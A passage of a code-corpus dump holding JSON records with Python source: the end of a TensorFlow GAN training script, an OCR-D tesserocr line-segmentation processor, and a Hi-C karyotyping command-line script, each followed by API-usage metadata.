self.dataset)\n \n # getting number of training iterations\n #iters = 1000\n print('number of batches for training: {}'.format(iters))\n\n for epc in range(epochs):\n print(\"epoch {} \".format(epc+1))\n for i in range(iters):\n counter += 1\n #get batch\n batch_images = next(batches)\n\n batch_z = np.random.uniform(-1, 1, [self.batch_size, self.z_dim]).astype(np.float32)\n\n #_, g_loss_value, d_loss_value = sess.run([train_op, losses[self.g], losses[self.d]])\n\n # ---> Run g_optim twice to make sure that d_loss does not go to zero?\n # Update D network\n _, D_loss_curr = self.sess.run([d_optim, self.d_loss], feed_dict={ self.inputs: batch_images, self.z: batch_z })\n\n # Update G network\n _, G_loss_curr = self.sess.run([g_optim, self.g_loss], feed_dict={ self.z: batch_z })\n\n # ---> Run g_optim twice to make sure that d_loss does not go to zero (different from paper)\n _, G_loss_curr = self.sess.run([g_optim, self.g_loss], feed_dict={ self.z: batch_z })\n \n errD_fake = self.d_loss_fake.eval({self.z: batch_z})\n errD_real = self.d_loss_real.eval({self.inputs: batch_images})\n errG = self.g_loss.eval({self.z: batch_z})\n \n if counter % 10 == 1:\n print(\"Epoch: [%2d/%2d] [%4d/%4d] time: %4.4f, d_loss: %.8f, g_loss: %.8f\" \\\n % (epc+1, epochs, i, iters,\n time.time() - start_time, errD_fake+errD_real, errG))\n \n if counter % 100 == 1:\n # do validation\n sample_in = tf.random_uniform([self.batch_size, self.z_dim], minval=-1.0, maxval=1.0)\n sample_input = self.sampler(sample_in)\n samples = self.sess.run([sample_input])\n #print(samples)\n #rescale generated image\n samples = (samples[0] + 1) * 255 / 2\n \n \n #show generated image\n img=samples[0,:,:,:]\n #print(img)\n img = img.astype(int)\n plt.imshow(img)\n plt.show()\n\n plt.savefig('gen_train_img/img_{}'.format(counter+epc))\n \n # Save checkpoint\n saver.save(self.sess, 'model/{}'.format(cur_model_name))\n print(\"Training complete. Model named {}.\".format(cur_model_name))\n \n def sampler(self, z, y=None):\n # This function creates sample images for validation in the training function\n with tf.variable_scope('generator', reuse=tf.AUTO_REUSE) as scope:\n #scope.reuse_variables()\n \n #reshape from inputs \n reshape_out = tf.layers.dense(z, self.g_dim[0] * self.s_size * self.s_size)\n reshape_out = tf.reshape(reshape_out, [-1, self.s_size, self.s_size, self.g_dim[0]])\n reshape_out = tf.nn.relu(tf.layers.batch_normalization(reshape_out, training=False), name='g_reshape')\n \n # deconv layer 1\n conv_1 = tf.layers.conv2d_transpose(reshape_out, self.g_dim[1], [5, 5], strides=(2, 2), padding='SAME')\n conv_1 = tf.nn.relu(tf.layers.batch_normalization(conv_1, training=False), name='g_conv_1')\n \n # deconv layer 2\n conv_2 = tf.layers.conv2d_transpose(conv_1, self.g_dim[2], [5, 5], strides=(2, 2), padding='SAME')\n conv_2 = tf.nn.relu(tf.layers.batch_normalization(conv_2, training=False), name='g_conv_2')\n \n # deconv layer 3\n conv_3 = tf.layers.conv2d_transpose(conv_2, self.g_dim[3], [5, 5], strides=(2, 2), padding='SAME')\n conv_3 = tf.nn.relu(tf.layers.batch_normalization(conv_3, training=False), name='g_conv_3')\n \n # deconv layer 4\n conv_4 = tf.layers.conv2d_transpose(conv_3, self.g_dim[4], [5, 5], strides=(2, 2), padding='SAME')\n \n #output image\n return(tf.nn.tanh(conv_4))\n \n \n", "sub_path": "model_old.py", "file_name": "model_old.py", "file_ext": "py", "file_size_in_byte": 16796, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "math.ceil", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 51, "usage_type": "attribute"}, {"api_name": "utils.block_mask", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.random_mask", "line_number": 81, "usage_type": "call"}, {"api_name": "utils.half_missing_mask", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 94, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 95, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 95, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 96, "usage_type": "attribute"}, {"api_name": "tensorflow.random_uniform", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 117, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_sum", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 127, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.multiply", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.ones_like", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 158, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 158, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 160, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 160, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 161, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 162, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 162, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 162, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 162, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 165, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 165, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 166, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 166, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 169, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 170, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 170, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 170, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 173, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 173, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 177, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 177, "usage_type": "attribute"}, {"api_name": "tensorflow.tanh", "line_number": 180, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 183, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 183, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 197, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 200, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 202, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 202, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 203, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 203, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 206, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 207, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 210, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 211, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 211, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 214, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 219, "usage_type": "call"}, {"api_name": "tensorflow.layers.dense", "line_number": 220, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 220, "usage_type": "attribute"}, {"api_name": "tensorflow.get_collection", "line_number": 223, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 223, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 232, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 232, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 242, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 242, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 242, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 242, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 243, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tensorflow.ones", "line_number": 246, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 246, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 247, "usage_type": "call"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 250, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 250, "usage_type": "attribute"}, {"api_name": "tensorflow.zeros", "line_number": 250, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 250, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 251, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 270, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 272, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 272, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 273, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 273, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 276, "usage_type": "call"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 278, "usage_type": "call"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 279, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 279, "usage_type": "attribute"}, {"api_name": "tensorflow.train.Saver", "line_number": 280, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 280, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 311, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 311, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 332, "usage_type": "call"}, {"api_name": "tensorflow.random_uniform", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 348, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 348, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 349, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 349, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "tensorflow.variable_scope", "line_number": 359, "usage_type": "call"}, {"api_name": "tensorflow.AUTO_REUSE", "line_number": 359, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.dense", "line_number": 363, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 363, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 364, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 365, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 365, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 365, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 368, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 368, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 369, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 369, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 369, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 369, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 372, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 372, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 373, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 373, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 373, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 373, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 376, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 376, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.relu", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.batch_normalization", "line_number": 377, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 380, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 380, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.tanh", "line_number": 383, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 383, "usage_type": "attribute"}]} +{"seq_id": "53633250", "text": "from __future__ import absolute_import\nfrom tesserocr import PyTessBaseAPI, RIL\nfrom ocrd import Processor\nfrom ocrd_utils import getLogger, concat_padded, points_from_xywh, polygon_from_points, xywh_from_points, MIMETYPE_PAGE\nfrom ocrd_modelfactory import page_from_file\nfrom ocrd_models.ocrd_page import (\n CoordsType,\n TextLineType,\n\n to_xml\n)\n\nfrom ocrd_tesserocr.config import TESSDATA_PREFIX, OCRD_TOOL\n\nlog = getLogger('processor.TesserocrSegmentLine')\n\nclass TesserocrSegmentLine(Processor):\n\n def __init__(self, *args, **kwargs):\n kwargs['ocrd_tool'] = OCRD_TOOL['tools']['ocrd-tesserocr-segment-line']\n kwargs['version'] = OCRD_TOOL['version']\n super(TesserocrSegmentLine, self).__init__(*args, **kwargs)\n\n\n def process(self):\n \"\"\"\n Performs the line segmentation.\n \"\"\"\n with PyTessBaseAPI(path=TESSDATA_PREFIX) as tessapi:\n for (n, input_file) in enumerate(self.input_files):\n pcgts = page_from_file(self.workspace.download_file(input_file))\n image_url = pcgts.get_Page().imageFilename\n for region in pcgts.get_Page().get_TextRegion():\n log.debug(\"Detecting lines in %s with tesseract\", region.id)\n image = self.workspace.resolve_image_as_pil(image_url, polygon_from_points(region.get_Coords().points))\n tessapi.SetImage(image)\n offset = xywh_from_points(region.get_Coords().points)\n for (line_no, component) in enumerate(tessapi.GetComponentImages(RIL.TEXTLINE, True)):\n line_id = '%s_line%04d' % (region.id, line_no)\n line_xywh = component[1]\n line_xywh['x'] += offset['x']\n line_xywh['y'] += offset['y']\n line_points = points_from_xywh(line_xywh)\n region.add_TextLine(TextLineType(id=line_id, Coords=CoordsType(line_points)))\n ID = concat_padded(self.output_file_grp, n)\n self.workspace.add_file(\n ID=ID,\n file_grp=self.output_file_grp,\n mimetype=MIMETYPE_PAGE,\n local_filename='%s/%s' % (self.output_file_grp, ID),\n content=to_xml(pcgts).encode('utf-8'),\n )\n", "sub_path": "ocrd_tesserocr/segment_line.py", "file_name": "segment_line.py", "file_ext": "py", "file_size_in_byte": 2366, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "ocrd_utils.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "ocrd.Processor", "line_number": 17, "usage_type": "name"}, {"api_name": "ocrd_tesserocr.config.OCRD_TOOL", "line_number": 20, "usage_type": "name"}, {"api_name": "ocrd_tesserocr.config.OCRD_TOOL", "line_number": 21, "usage_type": "name"}, {"api_name": "tesserocr.PyTessBaseAPI", "line_number": 29, "usage_type": "call"}, {"api_name": "ocrd_tesserocr.config.TESSDATA_PREFIX", "line_number": 29, "usage_type": "name"}, {"api_name": "ocrd_modelfactory.page_from_file", "line_number": 31, "usage_type": "call"}, {"api_name": "ocrd_utils.polygon_from_points", "line_number": 35, "usage_type": "call"}, {"api_name": "ocrd_utils.xywh_from_points", "line_number": 37, "usage_type": "call"}, {"api_name": "tesserocr.RIL.TEXTLINE", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tesserocr.RIL", "line_number": 38, "usage_type": "name"}, {"api_name": "ocrd_utils.points_from_xywh", "line_number": 43, "usage_type": "call"}, {"api_name": "ocrd_models.ocrd_page.TextLineType", "line_number": 44, "usage_type": "call"}, {"api_name": "ocrd_models.ocrd_page.CoordsType", "line_number": 44, "usage_type": "call"}, {"api_name": "ocrd_utils.concat_padded", "line_number": 45, "usage_type": "call"}, {"api_name": "ocrd_utils.MIMETYPE_PAGE", "line_number": 49, "usage_type": "name"}, {"api_name": "ocrd_models.ocrd_page.to_xml", "line_number": 51, "usage_type": "call"}]} +{"seq_id": "269670465", "text": "\nimport argparse\nimport scipy as sp\nimport scipy.cluster\nimport sys\nimport collections\nimport triangulation\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pdb\nfrom mypy.lib import nprint\n\ndef main():\n \n parser=argparse.ArgumentParser(description='De novo karyotyping of Hi-C data.',formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-in',help='Hi-C interaction matrix input file',dest='infile',type=str,required=True)\n parser.add_argument('-out',help='prefix for output files',dest='outfile',type=str,required=True)\n parser.add_argument('-nchr',help='number of chromosomes/clusters. 0 will automatically estimate this number.',dest='nchr',type=int,default=0)\n parser.add_argument('-drop',help='leaves every nth bin in the data, ignoring the rest. 1 will use whole dataset.',dest='drop', type=int,default=1)\n parser.add_argument('-ci',help='list of chromosomes/contigs to include. If empty, uses all chromosomes.',dest='included_chrs',nargs='*',type=str,default=['chr1', 'chr2', 'chr3', 'chr4', 'chr5', 'chr6', 'chr7', 'chr8','chr9', 'chr10', 'chr11', 'chr12', 'chr13', 'chr14', 'chr15','chr16', 'chr17', 'chr18', 'chr19', 'chr20', 'chr21', 'chr22','chrX'])\n parser.add_argument('-s',help='seed for randomizations',dest='seed',type=int,default=0)\n parser.add_argument('-f',help='fraction of data to use for average step length calculation',dest='rand_frac',type=float,default=0.8)\n parser.add_argument('-n',help='number of iterations for average step length calculation',dest='rand_n',type=int,default=20)\n parser.add_argument('-e',help='evaluation mode. chromosome names are assumed to be the true chromosomal assignment.',dest='evaluate',action='store_true')\n parser.add_argument('-minnumchr',help='minimum number of chromosomes',dest='minnumchr',type=int,default=2)\n parser.add_argument('-maxnumchr',help='maximum number of chromosomes',dest='maxnumchr',type=int,default=1000)\n parser.add_argument('-p',help='number of processors to use',dest='pnum',type=int,default=1)\n parser.add_argument('-pool',help='pool interactions for all contigs which share the same name by averaging',action='store_true')\n \n args=parser.parse_args()\n \n infile=args.infile\n outfile=args.outfile\n nchr=args.nchr\n drop=args.drop\n included_chrs=args.included_chrs\n seed=args.seed\n rand_frac=args.rand_frac\n rand_n=args.rand_n\n evaluate=args.evaluate\n minnumchr=args.minnumchr\n maxnumchr=args.maxnumchr\n pnum=args.pnum\n pool=args.pool\n\n if len(included_chrs)==0:\n included_chrs=None\n\n d,bin_chr,bin_position=triangulation.load_data_txt(infile,remove_nans=True,chrs=included_chrs,retain=drop)\n\n sys.stderr.write(\"loaded \"+str(bin_chr.shape[0])+\" contigs\\n\")\n\n if pool:\n d = triangulation.func_reduce_2d(d,keys1=bin_chr,keys2=bin_chr,func=np.mean)\n bin_position = np.c_[triangulation.func_reduce_2d(bin_position,keys1=bin_chr,func=np.min)[:,0], triangulation.func_reduce_2d(bin_position,keys1=bin_chr,func=np.max)[:,1]]\n bin_chr = np.unique(bin_chr)\n \n sys.stderr.write(\"pooled to \"+str(bin_chr.shape[0])+\" contigs\\n\")\n\n transform=lambda x: np.log(np.max(x+1))-np.log(x+1)\n \n pred_nchr=False\n if nchr==0:\n ## fix for the new version of triangulation\n ## a hack rather, because I have no idea what is\n ## going on here ...\n #nchr=(minnumchr,maxnumchr)\n nchr=maxnumchr\n pred_nchr=True\n \n n=d.shape[0]\n\n sys.stderr.write(\"karyotyping...\")\n res=triangulation.predict_karyotype(d,nchr=nchr,pred_nchr=pred_nchr,transform=transform,shuffle=True,seed=seed,rand_frac=rand_frac,rand_n=rand_n)\n sys.stderr.write(\"done.\\n\")\n \n if pred_nchr:\n clust,Z,nchr,mean_step_len=res\n \n maxval=mean_step_len[-nchr+1]\n msl=len(mean_step_len)\n\n np.savetxt(outfile+'_avg_step_len.tab',np.c_[np.arange(msl+1,1,-1),mean_step_len],fmt='%s',delimiter='\\t')\n\n plt.figure(figsize=(15,5))\n plt.plot(np.arange(msl+1,1,-1),mean_step_len,marker='o',color='b')\n plt.plot(nchr,maxval,marker='o',color='r')\n plt.gca().invert_xaxis()\n plt.xlabel('number of clusters')\n \n plt.vlines(minnumchr,0,maxval,color='r')\n plt.vlines(maxnumchr,0,maxval,color='r')\n\n plt.savefig(outfile+'_avg_step_len.png',dpi=600,format='png')\n \n plt.xlim(min(msl,nchr+30),max(0,nchr-30))\n plt.ylim(0,maxval*1.1)\n plt.savefig(outfile+'_avg_step_len_zoomed.png',dpi=600,format='png')\n \n sys.stderr.write(\"identified \"+str(nchr)+\" chromosomes.\\n\")\n \n\n\n else:\n clust,Z = res\n\n \n np.savetxt(outfile+'_clusteringZ.tab',Z,fmt='%s',delimiter='\\t')\n \n with open(outfile+'_clusters.tab','w') as fh:\n nprint([bin_chr,bin_position.astype('int'),clust.astype('int')],fh=fh)\n\n \n\n if evaluate:\n\n # match each cluster to the chromosome which most of its members belongs to\n \n chr_order=dict( zip(included_chrs,range(len(included_chrs))) )\n \n new_clust=np.zeros(n,dtype=bin_chr.dtype)\n new_clust_num=np.nan*np.ones(n)\n\n for i in range(nchr):\n\n new_clust[clust==i]=collections.Counter(bin_chr[clust==i]).most_common(1)[0][0]\n new_clust_num[clust==i]=chr_order[collections.Counter(bin_chr[clust==i]).most_common(1)[0][0]]\n\n sys.stderr.write(\"accuracy: \"+str(np.sum(new_clust==bin_chr)/float(n))+\"\\n\")\n\n plt.figure(figsize=(15,5))\n\n triangulation.chr_color_plot(np.mean(bin_position,1),bin_chr,new_clust_num,included_chrs) \n\n plt.savefig(outfile+'_evaluation.png',dpi=600,format='png')\n \n with open(outfile+'_evaluation.tab','w') as fh:\n nprint([bin_chr,bin_position.astype('int'),new_clust.astype('int')],fh=fh)\n\n \n\nif __name__==\"__main__\":\n main()\n\n \n", "sub_path": "scripts/karyotype.py", "file_name": "karyotype.py", "file_ext": "py", "file_size_in_byte": 5947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 15, "usage_type": "attribute"}, {"api_name": "triangulation.load_data_txt", "line_number": 50, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 52, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 52, "usage_type": "attribute"}, {"api_name": "triangulation.func_reduce_2d", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.c_", "line_number": 56, "usage_type": "attribute"}, {"api_name": "triangulation.func_reduce_2d", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 57, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 59, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 61, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 74, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 74, "usage_type": "attribute"}, {"api_name": "triangulation.predict_karyotype", "line_number": 75, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 76, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 76, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.c_", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.vlines", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 95, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "sys.stderr.write", "line_number": 101, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.savetxt", "line_number": 109, "usage_type": "call"}, {"api_name": "mypy.lib.nprint", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 123, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 123, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 127, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 128, "usage_type": "call"}, {"api_name": "sys.stderr.write", "line_number": 130, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "triangulation.chr_color_plot", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "mypy.lib.nprint", "line_number": 139, "usage_type": "call"}]} +{"seq_id": "532402228", "text": "from django.contrib import admin\nfrom 